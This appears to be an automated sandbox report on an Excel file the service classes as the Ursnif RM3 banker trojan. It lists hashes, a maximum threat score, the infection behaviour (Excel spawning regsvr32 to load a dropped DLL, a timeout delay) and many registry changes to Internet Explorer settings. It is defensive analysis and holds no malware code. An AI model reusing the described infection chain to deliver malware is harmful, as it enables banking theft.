ursnif_rm3 | ae87b82d817d363b159e072be2e2017dfe0bcf7fd3bc6a7c9dee0ff885eefc5f

Analysis

max time kernel
149s
max time network
152s
platform
windows7_x64
resource
win7v20201028
submitted
13/11/2020, 10:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Information.xlsb
Size

20KB
MD5

4dddb0320eac6050d6360c92c104d05c
SHA1

816db7af62de3dc200b88357a5341c6ce184cc93
SHA256

ae87b82d817d363b159e072be2e2017dfe0bcf7fd3bc6a7c9dee0ff885eefc5f
SHA512

b177b5faa839aeead6c9c732b0182b928903dd34e02d968b95cd93b2f3f01c3b72043c9dafcb6a96a9d1eeb67e4e12abaf537f7ac32b3d166d7f82914844881d

Score

10^/10

ursnif_rm3 banker trojan

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1496	1900	regsvr32.exe	24

Ursnif RM3
A heavily modified version of Ursnif discovered in the wild.
banker trojan ursnif_rm3

Loads dropped DLL 1 IoCs

pid	Process
1496	regsvr32.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2880	timeout.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 115 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039e08b06c84715459283081ff7bb5a60000000000200000000001066000000010000200000003a89aeebd6eac0e28ea5371ea4b3f212f8a0451a2ef00fd5fbec9ca7196f3fa8000000000e8000000002000020000000008f8fcc26faa105faaeb74ec4803762a64f4c26343dfd0d87084e4df2b6241e30010000fb0c79c272bec031c4ee81f097a6f3f4ac89e1af2656c6b62148494cd75815011cc1c3ebe1d652c01abbed02ee5e09ac9ce525195f448ee251f586dee007fdcbcfc4a589f224b4e116f475e25c60ef78e06015c99778a4b44bb98e83170185681bbc9fc50c91e3b569ffd3f95b126a67aa06ab3b44d9ecdf79ee3d570128cc0bba4606d5c9d6188782abc478067e8d1a66167063c711929cc78d9e47babbc0d0c14fef5a838471c87a0206abc2d2fa35c860ac08bf502ddf70f3ac7076c849ec4886269e5f26a2d8c3b1f717ea6c33b8c83bdf55a79e782c99e0c36d3773abb0a54d8bf2676ea3140db1339e3a89ddcbc20943ea29dc19293bbec5ca67757b629db5b3365c9b46aef33fa832bdfe598ff195ed8a311ff08d31525d3803e56bfae444490bbbc93de44dc6c491318bdb4c40000000203bb246df28b2978246b5b88b69566ae727d634089f001889647eec0a9202d9704ba8dc83cc0a2dd3839f8c9f0ff9fd3a88723eb5d06500a4259049af2ef4cd	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039e08b06c84715459283081ff7bb5a6000000000020000000000106600000001000020000000f55f83e612257ec7d3ce43e4d8f041d1f9b399d0ccf249e6321dc063a68dddbf000000000e80000000020000200000009f2008a70b16b3c6554d53586065829fab2231f9eab0b22b6625bd32f820d0f43001000029c0874bf2a6c151d6d02c77118fef665879bbfcfb0ab7af82d9dc801f50fc2b2ba6acbc92a7f81dcf9ca7a4932bd085f0a6d9a9a44995aaeb33afed86e1d106e4cad732cdf3c17ae345a3a97c8418c0c82e25c7d17a01b48b3eb74da26ba04b05cb23b7092bd5129a79f0c7de235a8e9a8c2baaaf3ba15fdefff7b83635a8884fae6bf2696cbba188922978c3e9b9ca343ac94c61e135febfcb011706d14a68792a4e2d630ea66320614d8eb77495ff84c3f151e4e38e44362519a092a8f751ed611beba8e6533f8b3295096762fad74042e1b18f8dececb2fc5ad2e1967b40036972912a888fddd5bd6f8d0901d5de9ecf87440fc43feaee6169170feaa6642b2c08cdbe4efea18a084aacac4fd6476c159adbfaf89aec4c1f25cfc7e09fbeab787170064374797f4f75653b2a00ae40000000802eb92dc02a2078f9e95606aaa259899989daadb62d961ce291b80503792538ebd07ded9de955b2c80fc506f93c7a38c63f5726cc22cceced6a265977133fc6	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039e08b06c84715459283081ff7bb5a6000000000020000000000106600000001000020000000422a56513b720de44178d6cbd5c25d4b71efc11aa0508a7e92ebcd92e5e302d1000000000e8000000002000020000000b4442980b7b9cbc48a7fd84263db20cf803af308241d4a5fc9be8a828b7cfc943001000038616e6a31be91c6c4bfc4fb85cf8d5effc8d307c906313f8388f325edcb1a15a76a3a880c2c13f380732671346cf95a286e424219cc55732e3e97b0a57bb7c8c5f4cad7ee928a8560dc7afde934f732ca4c3de755aa1bf9dd2b4d5d5f69972ea64067e708dcd64b26350f283e4c4c036ff704730609f7c09ca2c72a499e7f8e0d33e82bb5d20fd43d4556bcab1bdfae99ef277eb6bdc3e4521262277e8b7e96dbae46c99e2c49a79e61987e8e2eb9c7824c1653b5efbd8ea771c3fbc6ad4d30d28288cfcc199a38b8803536a2ed2017307fb5ee06b5491b2cdc6e56c40b018aea0c683e063fa76e366e6a60b6a887b00bb6628b4f43e756dd6973c0049037e04a9678738d2b40748a86f4e025a12c053f0f68b2df8bb6f91177a4d33330bf6ccb996d860fd0987d46a06498867f4945400000008e37ee50ee12edd131f75143a3487f9c4cb22412a11a3f0e36b6bc70f073658d3706dbb9defad8fb0c30d3e96f3a122cdc133f3a81b3262aa23ca549e6371c61	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039e08b06c84715459283081ff7bb5a60000000000200000000001066000000010000200000009aae01c5e1f91d3f1d89fa7a6c6c1a642228b829e07d0495870afb578491a7ed000000000e8000000002000020000000b9f35ae120e1616e2743805f9856486a98db501513583f36ed921eeb4d7eb8fc30010000648863f5bb70ce55279c505b5485230bae48558508c66b555e16f324e2ffd0317191ca65da8fa964e52ce8c22c00511b338e92e5fca7e8fb71e84b51b357b4885dd493fbbb16adb6efb1971b8b6f5320272ec127b421ea0d07685adc2d9654143f18412b6f1aebe579e86e47dc0dae1c741dcc619b253e6a42c07b9e90778bc35c9f791fe135b4c80ce2d3c8e0ee43c666288e5bf4f7dc840d7e821a72dd121a011cb2f0d4f0dbb623282e90b5ca2c06e695282ea5c04e521033f1ae9639df996837e7b34313653279458cb8b74d457c1bb9d431385b0e9142c0cbb7286a0a3b9dcf80fcd9a8047e6a5012433b3ff7f3397d8ae88b1cfae860b9439b7a232db46322daf00fbf97d8ba752f13cab8476be37e9d749d5ad01c6d2ab4484ad60492faa4636627e2644a16bb949e0c578af540000000b12cbe20aabe64f52993c16ceca0012dcd44e67dbec178337905056340afe713587dc75e0a892f4018b827325c3badb2777d1e240248fc95cbf9d9373379b7fb	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039e08b06c84715459283081ff7bb5a60000000000200000000001066000000010000200000004403874a2ae7fb6b53cfa86d61f352e9d01a6c403ccdb7ce743dc1a1873eaf57000000000e80000000020000200000001f0d0f380ad19a4af5e4d901ea71bcb385e70259da5968e100190dd5ecacbc1630010000cdd9e783403774eba01b138c59f34e4c7c3962017f7c239fabb300cc292d6ae3e7c09c8832a48ff8de6ab989dd60bbc3c2935e60b02be6145874f80a5eeba8b0824ed186d75d025dcb1add76549b9fffb9355ca2326de69e6b9087bf90e91f7d5d959ea5e07117df353a4801d1082d5571d2f78ce0282596d8d2c7b2cf9ae3fe8b79fd7ab64d8bf0bbb118b15ea439d0448a62924d161d153f3b080939286e89f216f2acb81c391a1ac2a16d9973a3c109ff1c90720a515fdd57cc68db9bdf0b65890ff9c7c230a6d5c157bb760ef8d5e7716485436b1a3f77dc622c6aa3211dcb8138de07788b08901a91150d99fabe460e8b0ccc205b0bf95f84a382fd4365fb22fbaa78bf3ba6615eefd317d59ac14d030b59a701f0bf4ceaa348f15acb969a931332b0d6d4561448d4f27a612f4740000000ae451520d6cf8616e75433f630a6e0d15eb117f8eac1a448609c949af40519bdb0194d9d24d95e685fe1c4c8ba0a9c2a1e89cbd41ab4d7e1972b339256f3b77c	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3200000032000000b804000097020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039e08b06c84715459283081ff7bb5a6000000000020000000000106600000001000020000000104b2195c174c872d1773be6c9ccb1409d8770a2920407dc4f1e8f5e269d94bc000000000e80000000020000200000005db4c5403891c3492e9241c2fb0ee96ef31366c32d8e44d4606adc52018e70ae300100006556ed22a4c58d9eb8210824c8ee98b65cc5f1900e55fd2a0d3c2217a54b271e3c1c571ea58c403fe9b2827a238fe5894a2329d5a7774fbd6a6315f71f02a28e027c37768c34bb09df241bc3a3eef6d0143f3751a18550f998d33ba02a5d8923a12d514cf070718431d254130d91d95a0711fe56cf25500ce1c32ecfa04549f5006ee17ff6b0719f04851a2e0c8c21d93848a9c334de90b2f94a5955fb71cf71b164022521b2588242696f99bbdf62caba54d98455fd9f69b0ecbcb41654815e6eae112e06fab383309d10c32775e8c63fc6f3bc6752eb117ffca82167d7e1a4452435c84b0c720d1fd02cbec5608b02f4fe63c5ddbabc5d725973b5d4b674da6ff0a90b44130a17f6aef97c3a80ff7921c25d4701a1b8c9baa87886d8177b0f50420a5bea02a7112d2922f730a571c840000000cd5f30fe501e964fb31af3ca5cb0f3d57df9e9f54209edfbc79bc757090b8b5de238a39dd130e6b7290791526f926f8324f6239bd14e702bf09bcdb52660d8b7	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff6400000019000000ea0400007e020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039e08b06c84715459283081ff7bb5a6000000000020000000000106600000001000020000000b07acb0da9ff334aba208dcf0f2776095914e4d51a1586d81d40fd75a0227c88000000000e8000000002000020000000eea5e9f0a22b145f6bca08c281b770be2eb674e1f180beeb65705535131d30a130010000822dc82a8eb64911888c589008ce055dac03b4bcd4a2f7914d301a559900b02df45e3e1a61b7a19c5b2c3ba10617be06323bee2f9e172924dca6eb7b30f89e7062871662f6fa29d433a989f117299bab93a5b09fcbba35e9feac158b00a6b57f1fe69d684ef80afd5be963a99d3b653fa4105e58a646d8be70cf417187aa2cb6ba86774ee3ddfb76f2d0b639fc81813651b7c7d5a3a0bdd6bb46534f9ca54e4b9c83e6df07ab35ea9549cd85e009523b6161f38e89eb1fc91ee4ee4488aadfecccc14447af596e752f41cf7e356c8eb30ab64a06b2f8f37b5bc8ac72c9e5d81f5d9a1696813acd264001e6e2c2f87817fc919a7996dcacdfdcb3c0980db282bfa1688c477f1b0739e217aca0a877db241d93150daa38578b55de0db15174e8691a65839f16509c51adbf6b0555f7fa974000000093318312c4d500a6d76f8add4bf0a53955956a0103f690ebdb07fe85f4da08d07130742fc2b07487e9a77af7f9db15c83965d7e37836ccf16fa6614f171c682b	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039e08b06c84715459283081ff7bb5a60000000000200000000001066000000010000200000006da5f2012aca3c3a0eb0616c0625c1daf215a9b10903cc50ddef7f763d287c90000000000e800000000200002000000057317a5157d77bfa07411d9ec3a76064b60fcadbee3abdb95327091548f5396b300100004a5d473fa1652b010e5e040a0a45933df01b84d45352bde7aea2d1e2139fc6b72dcb39a87478a19732b10101a825945a11f209bbfb90bf29b7e010e7f4884801dfef1b015e1075b74a841654a486a8bb5359c460be91582b54695ec8a735d5489ab1c68d384c7f830bdf86ffebf90a7c27e7b5508b57e9003e42f2af537ba1df2fde8e4b91b369e9292b1ec6a6a5c1f1155c73329c7b9101f2905aa7375f34f3440e89abbd38487e6f098862632bd4765f2255782915453f53b465d6274246618676eb18b2255400a70b2b565bc8d653b1fde32bf8954ffcc8113212db26a7f5cb3556a9a92fc4a1c02e6bef221a7c3d3194946363b25327d92d35a4a7b953b87643249ca21e9c5252c26944a79f52bf2b78488594f39f2ea983af9ba0eacad318950033337b18c0e9248548d0e296564000000030993af09ad727cef22e6fb835a59bcb7ceb37139518fe8dc1a6e663239bbe25679d4d43f02a6fa0c8380c8974903d2d45d81f11e18ecf8f926c8e220afcbfa6	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff19000000190000009f0400007e020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039e08b06c84715459283081ff7bb5a6000000000020000000000106600000001000020000000432a9eaf291ba509e252589cef9f5b79ae2c05bf8763d7e41288aa2e1068383a000000000e800000000200002000000092818936b5d5f0d03b0f30a8682b17ce3f80c3db7720a6631ae25e682fa9852820000000dcfda5082be480b222d66ff5ab70c1098e03dc82c165af593f0cf3d20380e6a04000000033856f33517754518ffa6c5666c7140a44ba859baebfe75adee95e5a48d6905535f6b51dbd538d9e8d803cdd777cac18abb73b8f8055d90ec39715b9974b7f35	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{BD92E121-2597-11EB-9E5C-424ABE5A776C} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{CBF2EEE1-2597-11EB-9E5C-424ABE5A776C} = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff4b00000000000000d104000065020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039e08b06c84715459283081ff7bb5a600000000002000000000010660000000100002000000083798e8feaef8cda195328615a312d3760aced6dfbc3f1e2af7bd0e91a309e7f000000000e80000000020000200000005d3d032b373868756753c0eb418dc5e06b95e1f2857b11bdc77cf712f197b39b90000000e8d180db4468da8a834efc69775b87d9e3281c54a1a2fcae7d9c8171a62d5051923c27d57f2a17973d4bece39918d86bf218e8bd647a51828075cfaf60292a5b5bee0c5bb70104d637fb43aec46577b24b7a0aa8bad7e6180049eada3cd5c6b11e1cb4b837513b69b261bbf8b06512175720f73324995788fc0e299ee6846063f5745f14374fba96ad808ee5e5a4ac9e400000008765bbebe05bdff899a5b0135d1bc5108ee0a8cff5f09c17180de4b298b4c1a8f9f738009d7c3960b5241e790af73c66bbc0ed5e44572ae5ab997c7b5686586c	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
